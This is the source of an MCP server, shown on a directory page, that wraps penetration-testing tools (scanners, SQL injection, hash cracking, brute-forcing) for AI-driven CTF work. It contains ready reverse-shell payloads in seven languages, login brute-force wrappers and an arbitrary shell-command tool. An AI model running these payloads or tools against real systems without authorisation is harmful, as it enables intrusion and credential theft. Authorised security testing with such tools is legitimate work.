Skip to main content
Glama

Exegol MCP Server

by janoujan
exegol_server.py (23.7 kB)
#!/usr/bin/env python3
"""
Exegol MCP Server - Advanced penetration testing toolkit for CTF competitions

Every tool wraps an external command-line program, captures its output, stores
a timestamped copy in the results directory and returns a human-readable
report string. Intended for use only against systems you are authorised to
test.
"""

import asyncio
import base64
import codecs
import json
import logging
import os
import re
import shlex
import subprocess
import sys
from datetime import datetime, timezone
from pathlib import Path
from typing import Callable, Dict, List, Optional, Sequence, Tuple, Union
from urllib.parse import quote, unquote

import httpx
from mcp.server.fastmcp import FastMCP

# Configure logging to stderr (stdout is reserved for the MCP stdio transport)
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    stream=sys.stderr
)
logger = logging.getLogger("exegol-server")

# Initialize MCP server
mcp = FastMCP("exegol")

# Configuration
RESULTS_DIR = os.environ.get("EXEGOL_RESULTS_DIR", "/results")
OBSIDIAN_PATH = os.environ.get("OBSIDIAN_EXEGOL_PATH", "/results")

# Shared wordlist locations used by several tools.
_ROCKYOU = "/usr/share/wordlists/rockyou.txt"
_DEFAULT_USERS = "/usr/share/wordlists/metasploit/unix_users.txt"

# Anything outside this set is replaced by "_" when building result filenames.
_UNSAFE_FILENAME_CHAR = re.compile(r"[^A-Za-z0-9._-]")
_MAX_TARGET_NAME_LEN = 100

Command = Union[str, Sequence[str]]


# === UTILITY FUNCTIONS ===

def _safe_name(target: str) -> str:
    """Turn an arbitrary target string into a safe filename fragment."""
    if not target:
        return "general"
    # Leading dots are dropped so a result is never a hidden file or "..".
    cleaned = _UNSAFE_FILENAME_CHAR.sub("_", target).lstrip(".")
    return cleaned[:_MAX_TARGET_NAME_LEN] or "general"


def save_result(tool_name: str, content: str, target: str = "") -> str:
    """Save scan results with timestamp to Obsidian vault.

    Args:
        tool_name: Short tool identifier, used in the filename and header.
        content: Text to store below the header.
        target: What was scanned; sanitised before use in the filename.

    Returns:
        The path of the written file, or "" if saving failed. Saving is
        best-effort: failures are logged and never raised to the caller.
    """
    try:
        now = datetime.now()
        filename = f"{now.strftime('%Y%m%d_%H%M%S')}_{tool_name}_{_safe_name(target)}.txt"
        directory = Path(OBSIDIAN_PATH)
        directory.mkdir(parents=True, exist_ok=True)
        filepath = directory / filename

        header = (
            f"# {tool_name} Results\n"
            f"Target: {target}\n"
            f"Timestamp: {now.isoformat()}\n"
            f"\n{'='*60}\n\n"
        )
        # Explicit UTF-8: reports contain emoji, which a non-UTF-8 locale
        # default encoding cannot represent.
        filepath.write_text(header + content, encoding="utf-8")
        return str(filepath)
    except Exception as e:
        logger.error(f"Failed to save results: {e}")
        return ""


def run_command(
    command: Command,
    timeout: int = 300,
    *,
    input_text: Optional[str] = None,
) -> Tuple[str, int]:
    """Execute command and return output.

    Args:
        command: Either an argv sequence (run directly, no shell) or a single
            string (run through the shell). Pass a sequence whenever any part
            of the command comes from caller input.
        timeout: Seconds to wait before the process is killed.
        input_text: Optional text piped to the process's stdin.

    Returns:
        ``(output, returncode)``. ``output`` is stdout on success; on failure
        it is stderr, falling back to stdout when stderr is empty. A timeout
        or launch failure yields a message and a return code of -1.
    """
    # Without explicit input the child must not inherit our stdin: under the
    # stdio transport that pipe carries the MCP protocol stream.
    if input_text is None:
        stdin_kwargs = {"stdin": subprocess.DEVNULL}
    else:
        stdin_kwargs = {"input": input_text}

    try:
        result = subprocess.run(
            command,
            shell=isinstance(command, str),
            capture_output=True,
            text=True,
            errors="replace",  # tools may emit bytes that are not valid UTF-8
            timeout=timeout,
            **stdin_kwargs,
        )
    except subprocess.TimeoutExpired:
        return "⏱️ Command timed out", -1
    except Exception as e:
        return f"❌ Error: {str(e)}", -1

    if result.returncode == 0:
        return result.stdout, result.returncode
    return result.stderr or result.stdout, result.returncode


async def _run(
    command: Command,
    timeout: int = 300,
    *,
    input_text: Optional[str] = None,
) -> Tuple[str, int]:
    """Run ``run_command`` in a worker thread so the event loop stays responsive."""
    return await asyncio.to_thread(run_command, command, timeout, input_text=input_text)


def _split_args(value: str) -> List[str]:
    """Split a user value into shell-style words without invoking a shell."""
    try:
        return shlex.split(value)
    except ValueError:
        # Unbalanced quotes: treat the whole value as one argument.
        return [value.strip()]


def _completed(title: str, output: str, filepath: str) -> str:
    """Format the standard success report shared by most tools."""
    return f"✅ {title}\n\n{output}\n\n📁 Saved to: {filepath}"


# === RECONNAISSANCE TOOLS ===

@mcp.tool()
async def nmap_scan(target: str = "", scan_type: str = "quick", ports: str = "") -> str:
    """Perform nmap network scan with options: quick, full, stealth, vuln, or custom ports.

    Args:
        target: Host, network or space-separated list of hosts to scan.
        scan_type: Profile name; unknown names fall back to "quick".
        ports: Port specification used only by the "custom" profile.
    """
    if not target.strip():
        return "❌ Error: Target is required"

    ports = ports.strip()
    scan_types = {
        "quick": ["-sV", "-sC", "-T4"],
        "full": ["-p-", "-sV", "-sC", "-T4"],
        "stealth": ["-sS", "-sV", "-T2"],
        "vuln": ["-sV", "--script", "vuln"],
        "custom": ["-p", ports] if ports else ["-p-"],
    }
    flags = scan_types.get(scan_type, scan_types["quick"])
    argv = ["nmap", *flags, *_split_args(target)]

    logger.info(f"Running nmap scan: {shlex.join(argv)}")
    output, returncode = await _run(argv)

    if returncode != 0:
        return f"❌ Nmap scan failed:\n{output}"
    filepath = save_result("nmap", output, target)
    return _completed("Nmap scan completed", output, filepath)


@mcp.tool()
async def gobuster_dir(url: str = "", wordlist: str = "common", extensions: str = "") -> str:
    """Perform directory brute-forcing with gobuster using wordlists: common, medium, big, or custom path.

    Args:
        url: Base URL to brute-force.
        wordlist: Named wordlist or a filesystem path to a custom one.
        extensions: Optional comma-separated extensions passed to ``-x``.
    """
    if not url.strip():
        return "❌ Error: URL is required"

    wordlists = {
        "common": "/usr/share/wordlists/dirb/common.txt",
        "medium": "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt",
        "big": "/usr/share/wordlists/dirbuster/directory-list-2.3-big.txt",
    }
    wlist = wordlists.get(wordlist, wordlist)

    argv = ["gobuster", "dir", "-u", url.strip(), "-w", wlist]
    if extensions.strip():
        argv += ["-x", extensions.strip()]
    argv.append("-q")

    logger.info(f"Running gobuster: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=600)

    filepath = save_result("gobuster", output, url)
    return _completed("Gobuster scan completed", output, filepath)


@mcp.tool()
async def ffuf_scan(url: str = "", wordlist: str = "common", mode: str = "dir") -> str:
    """Perform fuzzing with ffuf for directory, vhost, or parameter discovery.

    Args:
        url: Base URL; the FUZZ keyword is placed according to ``mode``.
        wordlist: Named wordlist (common, medium, params) or a custom path.
        mode: One of "dir", "vhost" or "param".
    """
    if not url.strip():
        return "❌ Error: URL is required"

    wordlists = {
        "common": "/usr/share/wordlists/dirb/common.txt",
        "medium": "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt",
        "params": "/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt",
    }
    wlist = wordlists.get(wordlist, wordlist)
    base_url = url.strip()

    if mode == "dir":
        argv = ["ffuf", "-u", f"{base_url}/FUZZ", "-w", wlist, "-c", "-v"]
    elif mode == "vhost":
        argv = ["ffuf", "-u", base_url, "-H", "Host: FUZZ", "-w", wlist, "-c", "-v"]
    elif mode == "param":
        argv = ["ffuf", "-u", f"{base_url}?FUZZ=test", "-w", wlist, "-c", "-v"]
    else:
        return "❌ Invalid mode. Use: dir, vhost, or param"

    logger.info(f"Running ffuf: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=600)

    filepath = save_result("ffuf", output, url)
    return _completed("FFUF scan completed", output, filepath)


@mcp.tool()
async def whatweb_scan(target: str = "", aggression: str = "1") -> str:
    """Identify web technologies and CMS using WhatWeb with aggression levels 1-4.

    Args:
        target: URL or host to fingerprint.
        aggression: Value passed to WhatWeb's ``-a`` option.
    """
    if not target.strip():
        return "❌ Error: Target is required"

    argv = ["whatweb", "-a", aggression.strip(), "-v", target.strip()]
    logger.info(f"Running whatweb: {shlex.join(argv)}")
    output, returncode = await _run(argv)

    filepath = save_result("whatweb", output, target)
    return _completed("WhatWeb scan completed", output, filepath)


# === WEB EXPLOITATION TOOLS ===

@mcp.tool()
async def sqlmap_scan(url: str = "", data: str = "", cookie: str = "", technique: str = "") -> str:
    """Perform SQL injection testing with sqlmap on URL with optional POST data and cookies.

    Args:
        url: Target URL (query strings containing ``&`` are passed intact).
        data: Optional POST body for ``--data``.
        cookie: Optional value for ``--cookie``.
        technique: Optional value for ``--technique``.
    """
    if not url.strip():
        return "❌ Error: URL is required"

    argv = ["sqlmap", "-u", url.strip(), "--batch", "--random-agent"]
    for flag, value in (("--data", data), ("--cookie", cookie), ("--technique", technique)):
        if value:
            argv += [flag, value]

    logger.info(f"Running sqlmap: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=900)

    filepath = save_result("sqlmap", output, url)
    return _completed("SQLMap scan completed", output, filepath)


@mcp.tool()
async def nikto_scan(target: str = "", ssl: str = "no") -> str:
    """Perform web vulnerability scanning with Nikto on target with optional SSL.

    Args:
        target: Host or URL passed to ``-h``.
        ssl: "yes" (case-insensitive) adds ``-ssl``; anything else does not.
    """
    if not target.strip():
        return "❌ Error: Target is required"

    argv = ["nikto", "-h", target.strip()]
    if ssl.lower() == "yes":
        argv.append("-ssl")

    logger.info(f"Running nikto: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=900)

    filepath = save_result("nikto", output, target)
    return _completed("Nikto scan completed", output, filepath)


@mcp.tool()
async def wpscan_scan(url: str = "", enumerate: str = "vp") -> str:
    """Scan WordPress sites with WPScan enumerating plugins, themes, users, or all.

    Args:
        url: WordPress site URL.
        enumerate: Value passed to ``--enumerate``.
    """
    if not url.strip():
        return "❌ Error: URL is required"

    argv = ["wpscan", "--url", url.strip(), "--enumerate", enumerate.strip(), "--random-user-agent"]
    logger.info(f"Running wpscan: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=900)

    filepath = save_result("wpscan", output, url)
    return _completed("WPScan completed", output, filepath)


# === POST-EXPLOITATION TOOLS ===

@mcp.tool()
async def reverse_shell_generator(ip: str = "", port: str = "4444", shell_type: str = "bash") -> str:
    """Generate reverse shell payloads for bash, python, php, powershell, nc, perl, ruby.

    Nothing is executed: the chosen template is filled in with ``ip`` and
    ``port``, saved, and returned together with a matching listener command.
    """
    if not ip.strip():
        return "❌ Error: IP address is required"

    shells = {
        "bash": f"bash -i >& /dev/tcp/{ip}/{port} 0>&1",
        "python": f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
        "php": f"php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
        "powershell": f"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{ip}\",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()",
        "nc": f"nc -e /bin/sh {ip} {port}",
        "perl": f"perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}};'",
        "ruby": f"ruby -rsocket -e'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
    }

    if shell_type not in shells:
        return f"❌ Invalid shell type. Available: {', '.join(shells.keys())}"

    payload = shells[shell_type]
    result = f"🐚 Reverse Shell Payload ({shell_type})\n\n{payload}\n\n⚡ Listener command:\nnc -lvnp {port}"

    filepath = save_result("reverse_shell", result, f"{ip}_{port}")
    return f"{result}\n\n📁 Saved to: {filepath}"


@mcp.tool()
async def linpeas_analyze(target_file: str = "") -> str:
    """Run LinPEAS privilege escalation analyzer on a system or analyze output file.

    Args:
        target_file: If given, this file is read and returned instead of
            running ``linpeas.sh``.
    """
    if target_file:
        try:
            # LinPEAS output carries ANSI colour codes and arbitrary bytes.
            with open(target_file, 'r', encoding="utf-8", errors="replace") as f:
                content = f.read()
            return f"✅ LinPEAS output loaded:\n\n{content}"
        except Exception as e:
            return f"❌ Error reading file: {str(e)}"

    logger.info("Running LinPEAS")
    output, returncode = await _run(["linpeas.sh"], timeout=300)

    filepath = save_result("linpeas", output, "localhost")
    return _completed("LinPEAS completed", output, filepath)


# === CRYPTOGRAPHY TOOLS ===

@mcp.tool()
async def hash_identify(hash_value: str = "") -> str:
    """Identify hash type using hash-identifier for common hash algorithms.

    Args:
        hash_value: The hash string; it is piped to the tool's stdin.
    """
    if not hash_value.strip():
        return "❌ Error: Hash value is required"

    logger.info("Identifying hash type")
    output, returncode = await _run(["hash-identifier"], input_text=f"{hash_value.strip()}\n")

    filepath = save_result("hash_identify", output, "hash")
    return _completed("Hash identification completed", output, filepath)


@mcp.tool()
async def john_crack(hash_file: str = "", wordlist: str = "rockyou", format: str = "") -> str:
    """Crack password hashes with John the Ripper using rockyou or custom wordlist.

    Args:
        hash_file: Path to the file containing hashes.
        wordlist: "rockyou" or a filesystem path to a custom wordlist.
        format: Optional value for ``--format``.
    """
    if not hash_file.strip():
        return "❌ Error: Hash file path is required"

    wlist = _ROCKYOU if wordlist == "rockyou" else wordlist

    argv = ["john"]
    if format:
        argv.append(f"--format={format}")
    argv += [f"--wordlist={wlist}", hash_file.strip()]

    logger.info(f"Running John the Ripper: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=3600)

    filepath = save_result("john", output, hash_file)
    return _completed("John the Ripper completed", output, filepath)


@mcp.tool()
async def hashcat_crack(hash_value: str = "", hash_mode: str = "0", wordlist: str = "rockyou") -> str:
    """Crack hashes with Hashcat specifying mode and wordlist: rockyou or custom.

    Args:
        hash_value: Hash string passed as hashcat's hash argument.
        hash_mode: Value for ``-m``.
        wordlist: "rockyou" or a filesystem path to a custom wordlist.
    """
    if not hash_value.strip():
        return "❌ Error: Hash value is required"

    wlist = _ROCKYOU if wordlist == "rockyou" else wordlist
    argv = ["hashcat", "-m", hash_mode.strip(), "-a", "0", hash_value.strip(), wlist]

    logger.info(f"Running Hashcat: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=3600)

    filepath = save_result("hashcat", output, "hash")
    return _completed("Hashcat completed", output, filepath)


def _base64_decode(text: str) -> str:
    """Decode base64, tolerating embedded whitespace and missing padding."""
    compact = "".join(text.split())
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("utf-8", errors="replace")


def _hex_decode(text: str) -> str:
    """Decode a hex string (ASCII whitespace between bytes is allowed)."""
    return bytes.fromhex(text.strip()).decode("utf-8", errors="replace")


# Operation name -> pure-Python transform. No subprocess is involved, so the
# input is never altered by a shell or given a trailing newline.
_TEXT_OPERATIONS: Dict[str, Callable[[str], str]] = {
    "base64_decode": _base64_decode,
    "base64_encode": lambda text: base64.b64encode(text.encode("utf-8")).decode("ascii"),
    "hex_decode": _hex_decode,
    "hex_encode": lambda text: text.encode("utf-8").hex(),
    "url_decode": unquote,
    "url_encode": quote,
    "rot13": lambda text: codecs.encode(text, "rot_13"),
}


@mcp.tool()
async def decode_encode(text: str = "", operation: str = "base64_decode", encoding: str = "") -> str:
    """Encode or decode text using base64, hex, url, rot13, or custom encoding.

    Args:
        text: Input text.
        operation: One of base64_encode, base64_decode, hex_encode,
            hex_decode, url_encode, url_decode, rot13.
        encoding: Accepted for interface compatibility; currently unused.
    """
    if not text.strip():
        return "❌ Error: Text is required"

    transform = _TEXT_OPERATIONS.get(operation)
    if transform is None:
        return f"❌ Invalid operation. Available: base64_encode, base64_decode, hex_encode, hex_decode, url_encode, url_decode, rot13"

    try:
        output = transform(text)
    except ValueError as e:
        # binascii.Error (bad base64) is a ValueError, as is bad hex input.
        return f"❌ Operation failed:\n{e}"
    except Exception as e:
        return f"❌ Error: {str(e)}"

    filepath = save_result("encode_decode", output, operation)
    return _completed(f"{operation} completed", output, filepath)


# === OSINT TOOLS ===

@mcp.tool()
async def whois_lookup(domain: str = "") -> str:
    """Perform WHOIS lookup on domain to get registration and ownership information."""
    if not domain.strip():
        return "❌ Error: Domain is required"

    argv = ["whois", domain.strip()]
    logger.info(f"Running whois: {shlex.join(argv)}")
    output, returncode = await _run(argv)

    filepath = save_result("whois", output, domain)
    return _completed("WHOIS lookup completed", output, filepath)


@mcp.tool()
async def dns_enum(domain: str = "", record_type: str = "A") -> str:
    """Enumerate DNS records for domain using types: A, AAAA, MX, NS, TXT, CNAME, SOA, ANY."""
    if not domain.strip():
        return "❌ Error: Domain is required"

    argv = ["dig", domain.strip(), record_type.strip(), "+short"]
    logger.info(f"Running DNS enumeration: {shlex.join(argv)}")
    output, returncode = await _run(argv)

    filepath = save_result("dns_enum", output, domain)
    return _completed("DNS enumeration completed", output, filepath)


@mcp.tool()
async def subdomain_enum(domain: str = "", tool: str = "subfinder") -> str:
    """Enumerate subdomains using subfinder, assetfinder, or amass tools.

    Args:
        domain: Domain to enumerate.
        tool: Tool name; unknown names fall back to subfinder.
    """
    if not domain.strip():
        return "❌ Error: Domain is required"

    name = domain.strip()
    tools = {
        "subfinder": ["subfinder", "-d", name, "-silent"],
        "assetfinder": ["assetfinder", "--subs-only", name],
        "amass": ["amass", "enum", "-passive", "-d", name],
    }
    argv = tools.get(tool, tools["subfinder"])

    logger.info(f"Running subdomain enumeration: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=600)

    filepath = save_result("subdomain_enum", output, domain)
    return _completed("Subdomain enumeration completed", output, filepath)


@mcp.tool()
async def theHarvester_scan(domain: str = "", sources: str = "google") -> str:
    """Gather emails, subdomains, IPs using theHarvester from sources: google, bing, linkedin, twitter, all."""
    if not domain.strip():
        return "❌ Error: Domain is required"

    argv = ["theHarvester", "-d", domain.strip(), "-b", sources.strip()]
    logger.info(f"Running theHarvester: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=600)

    filepath = save_result("theharvester", output, domain)
    return _completed("theHarvester scan completed", output, filepath)


# === STEGANOGRAPHY TOOLS ===

@mcp.tool()
async def steghide_extract(file_path: str = "", passphrase: str = "") -> str:
    """Extract hidden data from image files using steghide with optional passphrase.

    Args:
        file_path: Cover file to extract from. Extracted data is written to
            ``<file_path>_extracted.txt``.
        passphrase: Passphrase; an empty string is passed explicitly so
            steghide never prompts.
    """
    if not file_path.strip():
        return "❌ Error: File path is required"

    source = file_path.strip()
    output_file = f"{source}_extracted.txt"
    argv = ["steghide", "extract", "-sf", source, "-p", passphrase, "-xf", output_file]

    # The passphrase is deliberately kept out of the log line.
    logger.info(f"Running steghide: steghide extract -sf {shlex.quote(source)}")
    output, returncode = await _run(argv)

    result = f"ℹ️ Steghide output:\n{output}"
    # Only trust the output file when this run succeeded; otherwise a file
    # left over from an earlier run would be reported as a fresh extraction.
    if returncode == 0:
        try:
            with open(output_file, 'r', encoding="utf-8", errors="replace") as f:
                extracted = f.read()
            result = f"✅ Steghide extraction completed\n\nExtracted content:\n{extracted}"
        except OSError as e:
            logger.warning(f"Could not read steghide output file: {e}")

    filepath = save_result("steghide", result, file_path)
    return f"{result}\n\n📁 Saved to: {filepath}"


@mcp.tool()
async def exiftool_analyze(file_path: str = "") -> str:
    """Extract metadata from files using exiftool to find hidden information."""
    if not file_path.strip():
        return "❌ Error: File path is required"

    argv = ["exiftool", file_path.strip()]
    logger.info(f"Running exiftool: {shlex.join(argv)}")
    output, returncode = await _run(argv)

    filepath = save_result("exiftool", output, file_path)
    return _completed("ExifTool analysis completed", output, filepath)


@mcp.tool()
async def binwalk_analyze(file_path: str = "", extract: str = "no") -> str:
    """Analyze files for embedded data and firmware with binwalk, optionally extract contents.

    Args:
        file_path: File to analyse.
        extract: "yes" (case-insensitive) adds ``-e``; anything else does not.
    """
    if not file_path.strip():
        return "❌ Error: File path is required"

    argv = ["binwalk"]
    if extract.lower() == "yes":
        argv.append("-e")
    argv.append(file_path.strip())

    logger.info(f"Running binwalk: {shlex.join(argv)}")
    output, returncode = await _run(argv)

    filepath = save_result("binwalk", output, file_path)
    return _completed("Binwalk analysis completed", output, filepath)


# === BRUTE FORCE TOOLS ===

@mcp.tool()
async def hydra_bruteforce(target: str = "", service: str = "ssh", username: str = "", wordlist: str = "rockyou") -> str:
    """Brute-force login credentials with Hydra for ssh, ftp, http, smb, rdp services.

    Args:
        target: Host to attack.
        service: Hydra service module name.
        username: Single login; when empty a default user list is used.
        wordlist: "rockyou" or a filesystem path to a password list.
    """
    if not target.strip() or not service.strip():
        return "❌ Error: Target and service are required"

    wlist = _ROCKYOU if wordlist == "rockyou" else wordlist
    user_args = ["-l", username] if username else ["-L", _DEFAULT_USERS]
    argv = ["hydra", "-v", *user_args, "-P", wlist, target.strip(), service.strip()]

    logger.info(f"Running Hydra: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=3600)

    filepath = save_result("hydra", output, f"{target}_{service}")
    return _completed("Hydra brute-force completed", output, filepath)


@mcp.tool()
async def medusa_bruteforce(target: str = "", service: str = "ssh", username: str = "", wordlist: str = "rockyou") -> str:
    """Brute-force credentials with Medusa for various network services.

    Args:
        target: Host to attack.
        service: Medusa module name.
        username: Single login; when empty a default user list is used.
        wordlist: "rockyou" or a filesystem path to a password list.
    """
    if not target.strip() or not service.strip():
        return "❌ Error: Target and service are required"

    wlist = _ROCKYOU if wordlist == "rockyou" else wordlist
    user_args = ["-u", username] if username else ["-U", _DEFAULT_USERS]
    argv = ["medusa", "-h", target.strip(), "-M", service.strip(), *user_args, "-P", wlist]

    logger.info(f"Running Medusa: {shlex.join(argv)}")
    output, returncode = await _run(argv, timeout=3600)

    filepath = save_result("medusa", output, f"{target}_{service}")
    return _completed("Medusa brute-force completed", output, filepath)


# === UTILITY TOOLS ===

@mcp.tool()
async def list_saved_results(filter: str = "") -> str:
    """List all saved scan results from Obsidian vault with optional filter.

    Args:
        filter: Case-insensitive substring a filename must contain.

    Returns:
        Up to 50 entries, newest first, with size and modification time.
    """
    try:
        needle = filter.lower()
        # Stat each file once and keep the result for sorting and display.
        entries = [
            (path.name, path.stat())
            for path in Path(OBSIDIAN_PATH).glob("*.txt")
            if not needle or needle in path.name.lower()
        ]
        if not entries:
            return "ℹ️ No results found"

        entries.sort(key=lambda entry: entry[1].st_mtime, reverse=True)

        lines = ["📁 Saved Results:\n\n"]
        for name, info in entries[:50]:
            mtime = datetime.fromtimestamp(info.st_mtime).strftime("%Y-%m-%d %H:%M:%S")
            lines.append(f"• {name} ({info.st_size} bytes) - {mtime}\n")
        if len(entries) > 50:
            lines.append(f"\n... and {len(entries) - 50} more files")
        return "".join(lines)
    except Exception as e:
        return f"❌ Error listing results: {str(e)}"


@mcp.tool()
async def read_saved_result(filename: str = "") -> str:
    """Read a specific saved result file from Obsidian vault.

    Args:
        filename: Name of a file inside the results directory. Paths that
            resolve outside that directory are rejected.
    """
    if not filename.strip():
        return "❌ Error: Filename is required"

    try:
        base = Path(OBSIDIAN_PATH).resolve()
        filepath = (base / filename.strip()).resolve()
        try:
            # Rejects "../" escapes and absolute paths.
            filepath.relative_to(base)
        except ValueError:
            return f"❌ Error reading file: {filename} is outside the results directory"

        with open(filepath, 'r', encoding="utf-8", errors="replace") as f:
            content = f.read()
        return f"✅ File content:\n\n{content}"
    except FileNotFoundError:
        return f"❌ File not found: {filename}"
    except Exception as e:
        return f"❌ Error reading file: {str(e)}"


@mcp.tool()
async def custom_command(command: str = "", save: str = "yes") -> str:
    """Execute custom command in Exegol container with optional result saving.

    Args:
        command: Shell command line, executed as given.
        save: "yes" (case-insensitive) stores the output in the vault.
    """
    if not command.strip():
        return "❌ Error: Command is required"

    logger.info(f"Executing custom command: {command}")
    # NOTE(security): this tool intentionally runs an arbitrary shell command;
    # a plain string makes run_command use the shell. Expose it only to
    # trusted clients.
    output, returncode = await _run(command, timeout=600)

    result = f"🔧 Command: {command}\n\n{output}"

    if save.lower() == "yes":
        filepath = save_result("custom_command", result, "custom")
        return f"{result}\n\n📁 Saved to: {filepath}"
    else:
        return result


# === SERVER STARTUP ===

if __name__ == "__main__":
    logger.info("Starting Exegol MCP server...")
    logger.info(f"Results directory: {OBSIDIAN_PATH}")

    # Create results directory if it doesn't exist
    os.makedirs(OBSIDIAN_PATH, exist_ok=True)

    try:
        mcp.run(transport='stdio')
    except Exception as e:
        logger.error(f"Server error: {e}", exc_info=True)
        sys.exit(1)

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/janoujan/exegol-mcp-server'

If you have feedback or need assistance with the MCP directory API, please join our Discord server.